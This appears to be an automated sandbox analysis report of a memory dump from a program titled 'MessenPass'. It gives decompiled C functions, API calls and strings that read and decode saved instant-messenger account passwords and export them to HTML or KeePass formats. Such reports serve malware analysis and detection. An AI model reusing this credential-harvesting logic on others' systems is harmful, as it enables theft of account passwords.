                                          • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                          • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
                                          • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                          • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E0040244D(short* _a4, short* _a8) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				char _v9;
                                          				char _v10;
                                          				char _v11;
                                          				char _v12;
                                          				char _v13;
                                          				char _v14;
                                          				char _v15;
                                          				char _v16;
                                          				char _v17;
                                          				char _v18;
                                          				char _v19;
                                          				char _v20;
                                          				char _v21;
                                          				char _v22;
                                          				char _v23;
                                          				char _v24;
                                          				char _v25;
                                          				char _v26;
                                          				char _v27;
                                          				char _v28;
                                          				char _v29;
                                          				char _v30;
                                          				char _v31;
                                          				char _v32;
                                          				char _v33;
                                          				char _v34;
                                          				char _v35;
                                          				char _v36;
                                          				char _v37;
                                          				char _v38;
                                          				char _v39;
                                          				char _v40;
                                          				char _v41;
                                          				char _v42;
                                          				char _v43;
                                          				char _v44;
                                          				char _v45;
                                          				char _v46;
                                          				char _v47;
                                          				char _v48;
                                          				char _v49;
                                          				char _v50;
                                          				char _v51;
                                          				char _v52;
                                          				char _v53;
                                          				char _v54;
                                          				char _v55;
                                          				char _v56;
                                          				char _v57;
                                          				char _v58;
                                          				char _v59;
                                          				void _v60;
                                          				intOrPtr _v64;
                                          				char _v68;
                                          				void _v1091;
                                          				char _v1092;
                                          				char _v2108;
                                          				void _v2116;
                                          				void* __edi;
                                          				char _t82;
                                          				void* _t89;
                                          				short* _t90;
                                          				void* _t92;
                                          				intOrPtr _t102;
                                          				short* _t103;
                                          				void* _t104;
                                          				intOrPtr* _t105;
                                          
                                          				_v1092 = 0;
                                          				memset( &_v1091, 0, 0x3ff);
                                          				_t105 = _t104 + 0xc;
                                          				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v1092, 0x400, 0, 0);
                                          				_t82 = E004029D9( &_v1092,  &_v2116, 0x400);
                                          				_t102 = _t82;
                                          				_pop(_t92);
                                          				if(_t102 > 8) {
                                          					0x413d5c(0x48);
                                          					_v68 = _t82;
                                          					 *_t105 = 0x1000;
                                          					0x413d5c();
                                          					_v64 = _t82;
                                          					_v60 = 0;
                                          					_v59 = 0;
                                          					_v58 = 0;
                                          					_v57 = 0;
                                          					_v56 = 0;
                                          					_v55 = 0;
                                          					_v54 = 0;
                                          					_v53 = 0;
                                          					_v52 = 0x99;
                                          					_v51 = 0;
                                          					_v50 = 0x86;
                                          					_v49 = 0xa5;
                                          					_v48 = 0x27;
                                          					_v47 = 0xaa;
                                          					_v46 = 0x9d;
                                          					_v45 = 0x7f;
                                          					_v44 = 0x58;
                                          					_v43 = 0xaa;
                                          					_v42 = 0xae;
                                          					_v41 = 0xb9;
                                          					_v40 = 0xb;
                                          					_v39 = 0x47;
                                          					_v38 = 0x3a;
                                          					_v37 = 0x35;
                                          					_v36 = 0xaa;
                                          					_v35 = 0xe0;
                                          					_v34 = 0xea;
                                          					_v33 = 0x95;
                                          					_v32 = 0x66;
                                          					_v31 = 0xfb;
                                          					_v30 = 0xe4;
                                          					_v29 = 0x9f;
                                          					_v28 = 0xcb;
                                          					_v27 = 0xf7;
                                          					_v26 = 0x16;
                                          					_v25 = 0x1c;
                                          					_v24 = 0xa3;
                                          					_v23 = 0x92;
                                          					_v22 = 0xe6;
                                          					_v21 = 0x1c;
                                          					_v20 = 0x96;
                                          					_v19 = 6;
                                          					_v18 = 0x9b;
                                          					_v17 = 0x5b;
                                          					_v16 = 0x29;
                                          					_v15 = 0x30;
                                          					_v14 = 0xbf;
                                          					_v13 = 0xaf;
                                          					_v12 = 0xec;
                                          					_v11 = 0x11;
                                          					_v10 = 0x29;
                                          					_v9 = 0xc8;
                                          					_v8 = 0x89;
                                          					_v7 = 0x5b;
                                          					_v6 = 0xb8;
                                          					_v5 = 0x57;
                                          					memcpy( &_v60,  &_v2116, 8);
                                          					E00403632(_t92,  &_v68,  &_v60);
                                          					_t70 = _t102 - 8; // -8
                                          					_t88 = _t70;
                                          					if(_t70 > 0x1fe) {
                                          						_t88 = 0x1fe;
                                          					}
                                          					_t103 = _a4;
                                          					_t89 = E0040373E(_t88, _t103,  &_v2108,  &_v68);
                                          					 *((short*)(_t103 + 0x1fe)) = 0;
                                          					0x413d56(_v68);
                                          					0x413d56(_v64);
                                          					return _t89;
                                          				}
                                          				_t90 = _a4;
                                          				 *_t90 = 0;
                                          				return _t90;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0040246E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                            • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                          • memcpy.MSVCRT ref: 004025B4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                          • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                          • API String ID: 3606715663-4187034442
                                          • Opcode ID: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                          • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                          • Opcode Fuzzy Hash: 78e2de6518f2aa96f91a21bf45264a70b6d05d7b6be762a733f529882e30edb8
                                          • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040E0A1(intOrPtr* _a4, char* _a8) {
                                          				char* _v8;
                                          				void _v275;
                                          				char _v276;
                                          				void _v531;
                                          				char _v532;
                                          				intOrPtr _v536;
                                          				intOrPtr _v540;
                                          				int _v796;
                                          				int _v1052;
                                          				void _v2075;
                                          				char _v2076;
                                          				void _v3099;
                                          				int _v3100;
                                          				void _v4123;
                                          				int _v4124;
                                          				void _v5147;
                                          				char _v5148;
                                          				void* __ebx;
                                          				void* __edi;
                                          				int _t50;
                                          				char* _t54;
                                          				int _t89;
                                          				int* _t105;
                                          				void* _t110;
                                          				void* _t111;
                                          
                                          				0x414060();
                                          				_t89 = 0;
                                          				_v276 = 0;
                                          				memset( &_v275, 0, 0x104);
                                          				_t50 = strlen(_a8);
                                          				_t5 = strlen("accounts.ini") + 1; // 0x1
                                          				_t111 = _t110 + 0x14;
                                          				if(_t50 + _t5 >= 0x104) {
                                          					_v276 = 0;
                                          				} else {
                                          					E00406B4B( &_v276, _a8, "accounts.ini");
                                          				}
                                          				_t54 = GetPrivateProfileIntA("Accounts", "num", _t89,  &_v276);
                                          				_v8 = _t54;
                                          				_a8 = _t89;
                                          				if(_t54 > _t89) {
                                          					do {
                                          						_v532 = _t89;
                                          						memset( &_v531, _t89, 0xfe);
                                          						_v5148 = _t89;
                                          						memset( &_v5147, _t89, 0x3ff);
                                          						_v2076 = _t89;
                                          						memset( &_v2075, _t89, 0x3ff);
                                          						_v3100 = _t89;
                                          						memset( &_v3099, _t89, 0x3ff);
                                          						_v4124 = _t89;
                                          						memset( &_v4123, _t89, 0x3ff);
                                          						_push(_a8);
                                          						sprintf( &_v532, "Account%3.3d");
                                          						_t111 = _t111 + 0x48;
                                          						GetPrivateProfileStringA( &_v532, "Account", 0x417c88,  &_v5148, 0x3ff,  &_v276);
                                          						GetPrivateProfileStringA( &_v532, "Password", 0x417c88,  &_v2076, 0x3ff,  &_v276);
                                          						if(_v2076 != _t89) {
                                          							E004029D9( &_v2076,  &_v3100, 0x3ff);
                                          							E0040DCF2( &_v4124,  &_v3100);
                                          							_v1052 = _t89;
                                          							_v796 = _t89;
                                          							_v536 = 0xf;
                                          							_v540 = 0x15;
                                          							E00406958(0xff,  &_v796,  &_v4124);
                                          							_t105 =  &_v1052;
                                          							E00406958(0xff, _t105,  &_v5148);
                                          							 *((intOrPtr*)( *_a4))(_t105);
                                          							_t89 = 0;
                                          						}
                                          						_a8 =  &(_a8[1]);
                                          						_t54 = _a8;
                                          					} while (_t54 < _v8);
                                          				}
                                          				return _t54;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0040E0C7
                                          • strlen.MSVCRT ref: 0040E0CF
                                          • strlen.MSVCRT ref: 0040E0DB
                                          • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
                                          • memset.MSVCRT ref: 0040E146
                                          • memset.MSVCRT ref: 0040E15A
                                          • memset.MSVCRT ref: 0040E16E
                                          • memset.MSVCRT ref: 0040E182
                                          • memset.MSVCRT ref: 0040E196
                                          • sprintf.MSVCRT ref: 0040E1AA
                                          • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
                                          • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
                                          • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
                                          • API String ID: 1850607429-3672167483
                                          • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                          • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
                                          • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                          • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
                                          • API String ID: 1439213657-55676784
                                          • Opcode ID: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                          • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
                                          • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                          • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                          • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                          • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                          • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 48%
                                          			E0040A242(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				void _v79;
                                          				char _v80;
                                          				void _v131;
                                          				char _v132;
                                          				void _v183;
                                          				char _v184;
                                          				char _v236;
                                          				void _v491;
                                          				char _v492;
                                          				void* _t83;
                                          				void* _t98;
                                          				intOrPtr* _t100;
                                          				intOrPtr* _t112;
                                          				signed int _t113;
                                          				intOrPtr _t131;
                                          				signed int _t144;
                                          				signed int _t145;
                                          				signed int _t148;
                                          				intOrPtr* _t149;
                                          				void* _t150;
                                          				void* _t152;
                                          
                                          				_t112 = __ebx;
                                          				_v492 = 0;
                                          				memset( &_v491, 0, 0xfe);
                                          				_t113 = 0xc;
                                          				memcpy( &_v236, 0x418424, _t113 << 2);
                                          				asm("movsb");
                                          				_t148 = 0;
                                          				_v132 = 0;
                                          				memset( &_v131, 0, 0x31);
                                          				_v184 = 0;
                                          				memset( &_v183, 0, 0x31);
                                          				_v80 = 0;
                                          				memset( &_v79, 0, 0x31);
                                          				_t152 = _t150 + 0x3c;
                                          				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                          				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                          				if(_t83 != 0xffffffff) {
                                          					0x41241f(_t83,  &_v492);
                                          					_push(_t83);
                                          					sprintf( &_v132, " bgcolor=\"%s\"");
                                          					_t152 = _t152 + 0x14;
                                          				}
                                          				E004067EC(_a4, "<table border=\"1\" cellpadding=\"5\">");
                                          				_v8 = _t148;
                                          				if( *((intOrPtr*)(_t112 + 0x20)) > _t148) {
                                          					while(1) {
                                          						_t144 =  *( *((intOrPtr*)(_t112 + 0x24)) + _v8 * 4);
                                          						if( *((intOrPtr*)((_t144 << 4) +  *((intOrPtr*)(_t112 + 0x34)) + 4)) != _t148) {
                                          							0x413d0c( &_v80, " nowrap");
                                          						}
                                          						_v28 = _v28 | 0xffffffff;
                                          						_v24 = _v24 | 0xffffffff;
                                          						_v20 = _v20 | 0xffffffff;
                                          						_v16 = _t148;
                                          						_t149 = _a8;
                                          						 *((intOrPtr*)( *_t112 + 0x30))(5, _v8, _t149,  &_v28);
                                          						0x41241f(_v28,  &_v184);
                                          						 *((intOrPtr*)( *_t149))(_t144,  *(_t112 + 0x4c));
                                          						0x41244b();
                                          						 *((intOrPtr*)( *_t112 + 0x48))( *((intOrPtr*)(_t112 + 0x50)), _t149, _t144);
                                          						_t98 =  *((intOrPtr*)( *_t112 + 0x14))();
                                          						_t145 = _t144 * 0x14;
                                          						if(_t98 == 0xffffffff) {
                                          							0x413d0c( *(_t112 + 0x54),  *((intOrPtr*)(_t145 + _v12 + 0x10)));
                                          						} else {
                                          							0x41241f(_t98,  &_v492,  *((intOrPtr*)(_t145 + _v12 + 0x10)));
                                          							_push(_t98);
                                          							sprintf( *(_t112 + 0x54), "<font color=\"%s\">%s</font>");
                                          							_t152 = _t152 + 0x10;
                                          						}
                                          						_t100 =  *((intOrPtr*)(_t112 + 0x50));
                                          						_t131 =  *_t100;
                                          						if(_t131 == 0 || _t131 == 0x20) {
                                          							0x413cf4(_t100, "&nbsp;");
                                          						}
                                          						0x4124d4( *((intOrPtr*)(_t112 + 0x58)),  *((intOrPtr*)(_t112 + 0x50)));
                                          						sprintf( *(_t112 + 0x4c),  &_v236,  &_v132,  *(_t112 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t112 + 0x58)));
                                          						E004067EC(_a4,  *(_t112 + 0x4c));
                                          						_t152 = _t152 + 0x2c;
                                          						_v8 = _v8 + 1;
                                          						if(_v8 >=  *((intOrPtr*)(_t112 + 0x20))) {
                                          							goto L14;
                                          						}
                                          						_t148 = 0;
                                          					}
                                          				}
                                          				L14:
                                          				E004067EC(_a4, "</table><p>");
                                          				return E004067EC(_a4, 0x417de8);
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                          • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
                                          • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                          • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E0040DD65(intOrPtr* _a4, char* _a8, char* _a12, intOrPtr _a16) {
                                          				void _v267;
                                          				char _v268;
                                          				void _v523;
                                          				char _v524;
                                          				intOrPtr _v528;
                                          				intOrPtr _v532;
                                          				int _v788;
                                          				int _v1044;
                                          				void _v2067;
                                          				char _v2068;
                                          				void _v3091;
                                          				char _v3092;
                                          				void _v4115;
                                          				int _v4116;
                                          				void* __ebx;
                                          				void* __edi;
                                          				int _t62;
                                          				intOrPtr* _t95;
                                          				int _t111;
                                          				int _t118;
                                          				intOrPtr* _t128;
                                          				void* _t134;
                                          				void* _t135;
                                          				void* _t136;
                                          
                                          				0x414060();
                                          				_t111 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				_t62 = strlen(_a8);
                                          				_t6 = strlen(_a12) + 1; // 0x1
                                          				_t135 = _t134 + 0x14;
                                          				if(_t62 + _t6 >= 0x104) {
                                          					_v268 = 0;
                                          				} else {
                                          					E00406B4B( &_v268, _a8, _a12);
                                          				}
                                          				if(E004069D3( &_v268) != 0) {
                                          					memset( &_v2067, _t111, 0x3ff);
                                          					memset( &_v3091, _t111, 0x3ff);
                                          					memset( &_v4115, _t111, 0x3ff);
                                          					_v524 = _t111;
                                          					memset( &_v523, _t111, 0xfe);
                                          					_push(_t111);
                                          					_a12 = _t111;
                                          					_v2068 = _t111;
                                          					_v3092 = _t111;
                                          					_v4116 = _t111;
                                          					sprintf( &_v524, "profile %d");
                                          					_t136 = _t135 + 0x3c;
                                          					GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
                                          					GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
                                          					if(_v2068 != _t111) {
                                          						L7:
                                          						while(_v3092 != _t111) {
                                          							E0040DCF2( &_v4116,  &_v3092);
                                          							_v528 = _a16;
                                          							_v1044 = _t111;
                                          							_v788 = _t111;
                                          							_v532 = 3;
                                          							E00406958(0xff,  &_v788,  &_v4116);
                                          							_t128 =  &_v1044;
                                          							E00406958(0xff, _t128,  &_v2068);
                                          							_t118 = _v1044;
                                          							_t95 = _t128;
                                          							while(_t118 != 0) {
                                          								if(_t118 >= 0x30 && _t118 <= 0x39) {
                                          									_t95 = _t95 + 1;
                                          									_t118 =  *_t95;
                                          									continue;
                                          								}
                                          								L14:
                                          								_push( &_v1044);
                                          								if( *((intOrPtr*)( *_a4))() != 0) {
                                          									_a12 =  &(_a12[1]);
                                          									_push(_a12);
                                          									_v2068 = 0;
                                          									_v3092 = 0;
                                          									_v4116 = 0;
                                          									sprintf( &_v524, "profile %d");
                                          									_t136 = _t136 + 0xc;
                                          									GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
                                          									GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
                                          									if(_v2068 != 0) {
                                          										_t111 = 0;
                                          										goto L7;
                                          									}
                                          								}
                                          								goto L16;
                                          							}
                                          							_v528 = 3;
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          				L16:
                                          				return 1;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0040DD8B
                                          • strlen.MSVCRT ref: 0040DD93
                                          • strlen.MSVCRT ref: 0040DD9D
                                          • memset.MSVCRT ref: 0040DDEB
                                          • memset.MSVCRT ref: 0040DDF9
                                          • memset.MSVCRT ref: 0040DE07
                                          • memset.MSVCRT ref: 0040DE1F
                                          • sprintf.MSVCRT ref: 0040DE46
                                          • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
                                          • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          • sprintf.MSVCRT ref: 0040DF73
                                          • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
                                          • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
                                          • String ID: name$password$profile %d
                                          • API String ID: 3544386798-2462908242
                                          • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                          • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
                                          • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                          • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$memset$_mbscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 3402215030-3842416460
                                          • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                          • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
                                          • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                          • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E004010D0(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, signed short _a12) {
                                          				void* __edi;
                                          				void* _t28;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t44;
                                          				void* _t49;
                                          				signed short _t50;
                                          				struct HWND__* _t52;
                                          				signed short _t58;
                                          				struct HWND__* _t60;
                                          				void* _t70;
                                          				void* _t71;
                                          
                                          				_t70 = __edx;
                                          				_t28 = _a4 - 0x110;
                                          				_t71 = __ecx;
                                          				if(_t28 == 0) {
                                          					SetWindowTextA( *(__ecx + 4), "MessenPass");
                                          					SetDlgItemTextA( *(_t71 + 4), 0x3ea, _t71 + 0xc);
                                          					SetDlgItemTextA( *(_t71 + 4), 0x3ec, _t71 + 0x10b);
                                          					E00401085(_t71);
                                          					E00406CAA(_t70,  *(_t71 + 4));
                                          					L16:
                                          					return 0;
                                          				}
                                          				_t37 = _t28 - 1;
                                          				if(_t37 == 0) {
                                          					_t38 = _a8;
                                          					if(_t38 != 1 || _t38 >> 0x10 != 0) {
                                          						goto L16;
                                          					} else {
                                          						EndDialog( *(__ecx + 4), 1);
                                          						DeleteObject( *(_t71 + 0x20c));
                                          						L7:
                                          						return 1;
                                          					}
                                          				}
                                          				_t44 = _t37 - 0x27;
                                          				if(_t44 == 0) {
                                          					if(_a12 != GetDlgItem( *(__ecx + 4), 0x3ec)) {
                                          						goto L16;
                                          					}
                                          					SetBkMode(_a8, 1);
                                          					SetTextColor(_a8, 0xc00000);
                                          					return GetSysColorBrush(0xf);
                                          				}
                                          				_t49 = _t44 - 0xc8;
                                          				if(_t49 == 0) {
                                          					_t50 = _a12;
                                          					_t52 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                          					_push(_t50 >> 0x10);
                                          					_a12 = _t52;
                                          					if(ChildWindowFromPoint( *(_t71 + 4), _t50 & 0x0000ffff) != _a12) {
                                          						goto L16;
                                          					}
                                          					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
                                          					goto L7;
                                          				}
                                          				if(_t49 != 0) {
                                          					goto L16;
                                          				}
                                          				_t58 = _a12;
                                          				_t60 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                          				_push(_t58 >> 0x10);
                                          				_a12 = _t60;
                                          				if(ChildWindowFromPoint( *(_t71 + 4), _t58 & 0x0000ffff) != _a12) {
                                          					goto L16;
                                          				}
                                          				E00406D6B( *(_t71 + 4), _t71 + 0x10b);
                                          				goto L7;
                                          			}
















                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                            • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                          • LoadCursorA.USER32(00000067), ref: 00401186
                                          • SetCursor.USER32(00000000,?,?), ref: 0040118D
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                          • EndDialog.USER32(?,00000001), ref: 004011E5
                                          • DeleteObject.GDI32(?), ref: 004011F1
                                          • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                          • String ID: MessenPass
                                          • API String ID: 2410034309-1347981195
                                          • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                          • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                          • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                          • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 1439213657-1959339147
                                          • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                          • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
                                          • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                          • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404D18(struct HINSTANCE__** __esi) {
                                          				void* _t7;
                                          				struct HINSTANCE__* _t8;
                                          				_Unknown_base(*)()* _t14;
                                          
                                          				if( *__esi == 0) {
                                          					_t8 = LoadLibraryA("advapi32.dll");
                                          					 *__esi = _t8;
                                          					__esi[1] = GetProcAddress(_t8, "CryptAcquireContextA");
                                          					__esi[2] = GetProcAddress( *__esi, "CryptReleaseContext");
                                          					__esi[3] = GetProcAddress( *__esi, "CryptCreateHash");
                                          					__esi[4] = GetProcAddress( *__esi, "CryptGetHashParam");
                                          					__esi[5] = GetProcAddress( *__esi, "CryptHashData");
                                          					_t14 = GetProcAddress( *__esi, "CryptDestroyHash");
                                          					__esi[6] = _t14;
                                          					return _t14;
                                          				}
                                          				return _t7;
                                          			}







                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
